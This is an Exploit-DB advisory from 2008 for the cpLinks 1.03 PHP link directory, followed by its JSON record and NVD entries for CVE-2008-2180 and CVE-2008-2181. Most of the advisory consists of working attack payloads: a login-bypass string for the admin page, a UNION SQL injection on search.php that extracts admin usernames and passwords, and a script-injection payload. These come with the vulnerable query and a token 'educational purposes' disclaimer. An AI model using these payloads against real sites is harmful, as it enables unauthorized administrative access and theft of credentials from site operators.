ID EDB-ID:5538
Type exploitdb
Reporter InjEctOr5
Modified 2008-05-04T00:00:00
Description
cpLinks 1.03 (bypass/SQL/XXS) Multiple Remote Vulnerabilities. CVE-2008-2180,CVE-2008-2181. Webapps exploit for php platform
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
| _ __ __ __ ______ |
| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ |
| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ |
| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ |
| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ |
| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ |
| \ \____/ >> Kings of injection |
| \/___/ |
| |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
Title :: cpLinks v1.03 Multiple Vulnerabilities (bypass/SQL/XXS)
Author :: InjEctOr [s0f (at) w (dot) cn]
&& FishEr762 [SQ7 (at) w (dot) cn ]
Script Site :: http://www.cplinks.com/
Dork :: ThinkinG
Greets :: Allah ,TryaG TeaM & Muslims Hackers
Terms of use :: This exploit is just for educational purposes, DO NOT use it for illegal acts.
--------------------------------------------[C o n t e x t]-----------------------------------------
##########################
##Expl0!T1 bypass login ##
##########################
http://[site]/[script]/admin/
in username filed insert:
' or 1=1 /*
addition, some time must type any thing in password field
#####################################
## Explo!T 2 Reomte SQL Injection ##
#####################################
file/
search.php
@ line 57 ::
$query = "SELECT
category,
sub_category,
title,
url,
description,
status
FROM mnl_links
WHERE category='$search_category'
AND description LIKE '%$search_text%'
AND approved='yes'
ORDER BY status, rec_timestamp";
search url: http://localhost/[script's_bad_day]/search.php
so just insert in search filed this query :)
' union select admin_username,admin_password,3,4,5,6 from mnl_admin/*
##################
## EXpl!T3 Xss ##
##################
Vulnerability found in script search.php .. also !
in search field insert >"> and then xss c0de ::
example: >"><script>alert("!! InjEctOr TeaM Became Here !!")</script>>
############### T|-|4t'5 4ll ###############
-------------------------------------------[End of context]----------------------------------------
# milw0rm.com [2008-05-04]
{"id": "EDB-ID:5538", "type": "exploitdb", "bulletinFamily": "exploit", "title": "cplinks 1.03 bypass/sql/xxs Multiple Vulnerabilities", "description": "cpLinks 1.03 (bypass/SQL/XXS) Multiple Remote Vulnerabilities. CVE-2008-2180,CVE-2008-2181. Webapps exploit for php platform", "published": "2008-05-04T00:00:00", "modified": "2008-05-04T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/5538/", "reporter": "InjEctOr5", "references": [], "cvelist": ["CVE-2008-2181", "CVE-2008-2180"], "lastseen": "2016-01-31T22:15:33", "viewCount": 5, "enchantments": {"score": {"value": 7.0, "vector": "NONE", "modified": "2016-01-31T22:15:33", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-2180", "CVE-2008-2181"]}], "modified": "2016-01-31T22:15:33", "rev": 2}, "vulnersScore": 7.0}, "sourceHref": "https://www.exploit-db.com/download/5538/", "sourceData": "|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|\n| _ __ __ __ ______ |\n| /' \\ __ /'__`\\ /\\ \\__ /'__`\\ /\\ ___\\ |\n| /\\_, \\ ___ /\\_\\/\\_\\L\\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ __\\ \\ \\__/ |\n| \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ \\___``\\ |\n| \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\L\\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ \\/\\ \\L\\ \\ |\n| \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ \\ \\____/ |\n| \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ \\/___/ |\n| \\ \\____/ >> Kings of injection |\n| \\/___/ |\n| |\n|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|\n\nTitle :: cpLinks v1.03 Multiple Vulnerabilities (bypass/SQL/XXS)\n\n\nAuthor :: InjEctOr [s0f (at) w (dot) cn]\n\n&& FishEr762 [SQ7 (at) w (dot) cn ]\n\n\nScript Site :: http://www.cplinks.com/\n\nDork :: ThinkinG \n\nGreets :: Allah ,TryaG TeaM & Muslims Hackers\n\nTerms of use :: This exploit is just for educational purposes, DO NOT use it for illegal acts.\n\n\n\n--------------------------------------------[C o n t e x t]-----------------------------------------\n\n\n\n\n##########################\n##Expl0!T1 bypass login ##\n##########################\n\n\nhttp://[site]/[script]/admin/\n\n\nin username filed insert:\n\n' or 1=1 /* \n\naddition, some time must type any thing in password field\n\n\n\n#####################################\n## Explo!T 2 Reomte SQL Injection ##\n#####################################\n\nfile/\nsearch.php\n\n\n@ line 57 ::\n\n\n$query = \"SELECT\n\t\t\tcategory,\n\t\t\tsub_category,\n\t\t\ttitle,\n\t\t\turl,\n\t\t\tdescription,\n\t\t\tstatus\n\t\t\tFROM mnl_links\n\t\t\tWHERE category='$search_category'\n\t\t\tAND description LIKE '%$search_text%'\n\t\t\tAND approved='yes'\n\t\t\tORDER BY status, rec_timestamp\";\n\n\nsearch url: http://localhost/[script's_bad_day]/search.php\n\nso just insert in search filed this query :)\n\n' union select admin_username,admin_password,3,4,5,6 from mnl_admin/*\n\n\n##################\n## EXpl!T3 Xss ##\n##################\n\n\nVulnerability found in script search.php .. also !\n\n\nin search field insert >\"> and then xss c0de ::\n\n\n\nexample: >\"><script>alert(\"!! InjEctOr TeaM Became Here !!\")</script>>\n\n\n\n############### T|-|4t'5 4ll ############### \n\n\n-------------------------------------------[End of context]----------------------------------------\n\n# milw0rm.com [2008-05-04]\n", "osvdbidlist": ["44790", "44788", "44789"]}
{"cve": [{"lastseen": "2020-10-03T11:50:59", "description": "Multiple SQL injection vulnerabilities in cpLinks 1.03, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via the (1) admin_username parameter (aka the username field) to admin/index.php and the (2) search_text and (3) search_category parameters to search.php. NOTE: some of these details are obtained from third party information.", "edition": 3, "cvss3": {}, "published": "2008-05-13T22:20:00", "title": "CVE-2008-2180", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-2180"], "modified": "2017-09-29T01:31:00", "cpe": ["cpe:/a:cplinks:cplinks:1.03"], "id": "CVE-2008-2180", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2180", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:cplinks:cplinks:1.03:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:50:59", "description": "Multiple cross-site scripting (XSS) vulnerabilities in search.php in cpLinks 1.03 allow remote attackers to inject arbitrary web script or HTML via the (1) search_text and (2) search_category parameters. NOTE: the XSS reportedly occurs in a forced SQL error message. NOTE: some of these details are obtained from third party information.", "edition": 3, "cvss3": {}, "published": "2008-05-13T22:20:00", "title": "CVE-2008-2181", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-2181"], "modified": "2017-09-29T01:31:00", "cpe": ["cpe:/a:cplinks:cplinks:1.03"], "id": "CVE-2008-2181", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2181", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:cplinks:cplinks:1.03:*:*:*:*:*:*:*"]}]}
